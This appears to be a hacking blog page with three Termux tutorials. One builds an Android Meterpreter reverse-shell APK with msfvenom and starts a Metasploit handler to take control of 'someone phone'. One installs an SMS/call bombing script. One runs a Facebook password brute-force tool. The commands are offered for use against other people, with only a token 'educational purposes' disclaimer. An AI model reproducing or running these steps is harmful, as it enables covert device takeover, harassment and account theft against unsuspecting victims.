Featured Posts

Tuesday 21 July 2020

How to remotely control android device using Metasploit-Framework in termux

Hello guys,today I gotta introduce a very important tool in a hacker book that is metasploit framework..We use this tool for connecting payload..We can easily access someone phone using payload.but we need to install metasploit for make a connection between payload and metasploit framework..So without waste more time let's get started......

About Metasploit-Framework :-

Metasploit-Framework is a ruby based penetration testing platform that enables you write test and exploit code.its a essential tool for many attackers and defenders


Installation Cmd :-

$ pkg upgrade && pkg update -y

$ pkg install python python2

$ pkg install git

$ git clone https://github.com/Ethical-Hacking-Zone/T-Lazy

$ ls

$ cd T-Lazy

$ chmod +x install.sh

$ bash install.sh

Usages :-

$ python3 -m pip install requests

$ ls

$ python3 T-Lazy.py

Now choose first one install Metasploit-Framework option.then run that script until you can see successfully installed Metasploit-Framework in your terminal..then you can type 👇

First section :-

$ msfconsole

(For run/install msfconsole)

Second section :-

msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT 4444 R > /storage/emulated/0/Dmx.apk
 
Then back to first section 

(Confirm it when ur in Metasploit-Framework)

So type the following cmds given below :-

● use exploit/multi/handler
● set payload android/meterpreter/reverse_tcp
● set LHOST (your ip)
● set LPORT 4444
● exploit

Type help for more cmd after access his device..🔥

I hope this information helpful for you.if u found something interesting on this blog share and support us for more updates.

This tutorial only for educational purposes. I will not responsible what done by you.join my Telegram channel if you wanna learn more about Termux hacking.

Telegram channel:- TERMUX 【OFFICIAL】

https://t.me/TermuxOfficial01

DARKSTALKER:- 

https://t.me/DarkStalker01

(Author) Akhilesh_dmx



Monday 20 July 2020

How to sent spam sms / call bomb using TBomb script in Termux

Hey guys,
 we are come back with another excited Termux script in which we are gonna introduce with Sms bombing script.
If u excited or like this tutorial .then let's started to do it..........




About TBomb :-

TBomber is a open source SMS and call bomber for Linux and Termux...

Features:-
◆ Lot of integrated SMS /call APIs
◆ Unlimited bombing
◆ Call bombing
◆ Automatic updating mechanism

Installation Cmd :-

$ pkg upgrade && pkg update -y

$ pkg install git


$ ls

$ cd TBomb

$ chmod +x TBomb.sh

Usages :-

$ bash TBomb.sh

I hope this information is helpful for you.if you found something  interesting then support us for getting more updates.if u have any suggestion or any doubt ask on free to comment below ..thanks for visiting ma blog..have a nice day


TERMUX :- 


DARKSTALKERS :- 



    (Author) Akhilesh_Dmx


Sunday 19 July 2020

How to access Facebook account using Firecrack tool in Termux

Hi Guys,
            today I gonna show you a script using Facebook hacking in Termux.we can hack Facebook account using 3 method

1) Phishing

2) Bruteforce attack/wordlist attack/password attack

3)OTP Bypassing

Now here I choose 2nd one method which is Bruteforce attack.A Bruteforce attack consists of an attacker submitting many passwords or passphrase with the hope of eventually guessing correctly. So without waste more time, let's get started


Installation Commands :-

$ pkg upgrade && pkg update -y

$ pkg install python python2 -y

$ pkg install mechanize -y

$ pkg install git


$ ls

$ cd Firecrack

$ pip2 install -r requirements.txt

$ chmod +x requirements.txt

$ chmod +x firecrack.py

Usages :-

$ python2 firecrack.py

Run.......

#facebook hacking
#firecrack
#Termux
#bruteforce

I think this information is helpful for you .if u found something interesting knowledge on here or if u wanna learn about hacking and Termux script let's join my Telegram channel

Termux :- 


DARKSTALKER :- 



     (Author) Akhilesh_dmx